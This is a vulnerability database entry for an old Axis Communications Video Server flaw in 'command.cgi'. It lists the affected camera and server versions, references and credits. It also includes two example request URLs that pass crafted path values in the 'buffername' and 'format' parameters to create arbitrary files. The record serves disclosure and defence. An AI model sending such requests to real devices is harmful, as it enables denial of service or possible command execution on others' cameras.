Details of VAR-E-200302-0118

ID

VAR-E-200302-0118

EDB ID

22311

TITLE

Axis Communications Video Server 2.x - 'Command.cgi' File Creation - CGI remote Exploit

Trust: 0.6

sources: EXPLOIT-DB: 22311

DESCRIPTION

Axis Communications Video Server 2.x - 'Command.cgi' File Creation.. remote exploit for CGI platform

Trust: 0.6

sources: EXPLOIT-DB: 22311

AFFECTED PRODUCTS

vendor:	axis	model:	communications video server	scope:	eq	version:	2.x	Trust: 1.0
vendor:	axis	model:	communications network camera	scope:	eq	version:	24202.33	Trust: 0.3
vendor:	axis	model:	communications network camera	scope:	eq	version:	24202.32	Trust: 0.3
vendor:	axis	model:	communications network camera	scope:	eq	version:	24202.31	Trust: 0.3
vendor:	axis	model:	communications network camera	scope:	eq	version:	24202.12	Trust: 0.3
vendor:	axis	model:	communications video server	scope:	eq	version:	24012.33	Trust: 0.3
vendor:	axis	model:	communications video server	scope:	eq	version:	24012.32	Trust: 0.3
vendor:	axis	model:	communications video server	scope:	eq	version:	24012.31	Trust: 0.3
vendor:	axis	model:	communications video server	scope:	eq	version:	24012.20	Trust: 0.3
vendor:	axis	model:	communications video server	scope:	eq	version:	24002.33	Trust: 0.3
vendor:	axis	model:	communications video server	scope:	eq	version:	24002.32	Trust: 0.3
vendor:	axis	model:	communications video server	scope:	eq	version:	24002.31	Trust: 0.3
vendor:	axis	model:	communications video server	scope:	eq	version:	24002.20	Trust: 0.3
vendor:	axis	model:	communications ptz network camera	scope:	eq	version:	21302.32	Trust: 0.3

sources: BID: 6987 // EXPLOIT-DB: 22311

EXPLOIT

source: https://www.securityfocus.com/bid/6987/info

It has been reported that the Axis Video Servers do not properly handle input to the 'command.cgi' script. Because of this, an attacker may be able to create arbitrary files that would result in a denial of service, or potentially command execution.

http://www.example.com/axis-cgi/buffer/command.cgi?buffername=X&prealarm=1&postalarm=1&do=start&uri=/jpg/quad.jpg&format=[bad input]

http://www.example.com/axis-cgi/buffer/command.cgi?whatever paramsbuffername=[relative path to directory]format=[relative path to arbitrary file name]

Trust: 1.0

sources: EXPLOIT-DB: 22311

EXPLOIT LANGUAGE

txt

Trust: 0.6

sources: EXPLOIT-DB: 22311

PRICE

free

Trust: 0.6

sources: EXPLOIT-DB: 22311

TYPE

'Command.cgi' File Creation

Trust: 1.0

sources: EXPLOIT-DB: 22311

CREDITS

Martin Eiszner

Trust: 0.6

sources: EXPLOIT-DB: 22311

EXTERNAL IDS

db:	BID	id:	6987	Trust: 1.9
db:	EXPLOIT-DB	id:	22311	Trust: 1.6
db:	EDBNET	id:	44503	Trust: 0.6

sources: BID: 6987 // EXPLOIT-DB: 22311 // EDBNET: 44503

REFERENCES

url:	https://www.securityfocus.com/bid/6987/info	Trust: 1.0
url:	https://www.exploit-db.com/exploits/22311/	Trust: 0.6
url:	http://www.axis.com/products/camera_servers/index.htm	Trust: 0.3

sources: BID: 6987 // EXPLOIT-DB: 22311 // EDBNET: 44503

SOURCES

db:	BID	id:	6987
db:	EXPLOIT-DB	id:	22311
db:	EDBNET	id:	44503

LAST UPDATE DATE

2022-07-27T09:48:56.515000+00:00

SOURCES UPDATE DATE

db:

BID

id:

6987

date:

2003-02-28T00:00:00

SOURCES RELEASE DATE

db:	BID	id:	6987	date:	2003-02-28T00:00:00
db:	EXPLOIT-DB	id:	22311	date:	2003-02-28T00:00:00
db:	EDBNET	id:	44503	date:	2003-02-28T00:00:00